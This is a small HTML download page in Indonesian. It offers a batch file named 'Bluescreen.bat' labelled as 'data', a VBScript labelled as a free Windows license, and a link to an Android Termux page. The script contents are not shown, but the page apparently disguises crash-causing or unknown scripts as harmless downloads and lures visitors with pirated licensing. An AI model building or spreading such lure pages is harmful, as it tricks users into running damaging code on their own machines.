<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Download File</title>
    <style>
        body {
            font-family: Arial, sans-serif;
            line-height: 1.6;
            margin: 20px;
            background-color: #f0f0f0;
        }
        .container {
            max-width: 600px;
            margin: 0 auto;
            background-color: #fff;
            padding: 20px;
            border-radius: 5px;
            box-shadow: 0 0 10px rgba(0,0,0,0.1);
        }
        .download-link {
            display: block;
            padding: 10px 20px;
            margin-bottom: 10px;
            text-decoration: none;
            color: #333;
            background-color: #f9f9f9;
            border-radius: 5px;
            transition: background-color 0.3s ease;
        }
        .download-link:hover {
            background-color: #e0e0e0;
        }
    </style>
</head>
<body>
    <div class="container">
        <h1>Download File</h1>
        <a href="Bluescreen.bat" class="download-link" download>Download Data Rceo &lpar;"khusus laptop dan pc"&rpar;</a>
        <a href="jajew.vbs" class="download-link" download>Lisensi Windows Free😊 &lpar;"khusus laptop dan pc"&rpar;</a>
        <a href="android.html" class="download-link">Download Termux dan linux &lpar;"khusus untuk android"&rpar;</a>
    </div>
</body>
</html>
